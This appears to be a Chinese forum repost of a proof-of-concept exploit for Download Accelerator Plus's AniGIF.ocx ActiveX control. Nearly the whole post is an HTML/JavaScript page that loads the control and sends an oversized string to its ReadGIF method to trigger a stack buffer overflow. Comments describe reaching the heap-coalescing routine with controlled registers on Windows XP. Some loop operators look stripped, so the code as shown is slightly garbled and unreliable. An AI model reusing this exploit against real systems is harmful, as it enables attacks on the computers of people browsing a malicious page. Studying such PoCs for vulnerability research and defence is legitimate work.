• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

    发布者: 土豆服务器 | 发布时间: 2025-6-28 22:15| 查看数: 104| 评论数: 0|帖子模式

    <html>
    <body>
    <object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' />
    </object>
    <script language=javascript>

    // anigif.ocx by www.jcomsoft.com can be found distribuited with some applications,
    // I found it in Download Accelerator Plus 6.8.
    // DAP comes with an old version, but the last from jcomsoft is also vulnerable:
    // there's a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods,
    // the funny thing is that after the first exception that will be handled by IE,
    // when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx
    // with windogs xp sp1 or the second check of safe-unlink with sp2 in a standard heap
    // overflow scenario.

    var buf;
    for (var i=0; i<259; i  ) buf  = "X";

    buf  ="BBBB";
    buf  = "CCCC";

    for (var i=0; i<5728; i  ) buf  = "H";

    target.ReadGIF(buf);

    window.location = "http://www.google.com";

    </script>
    </body>
    </html>


    来源:https://www.jb51.net/hack/5589.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表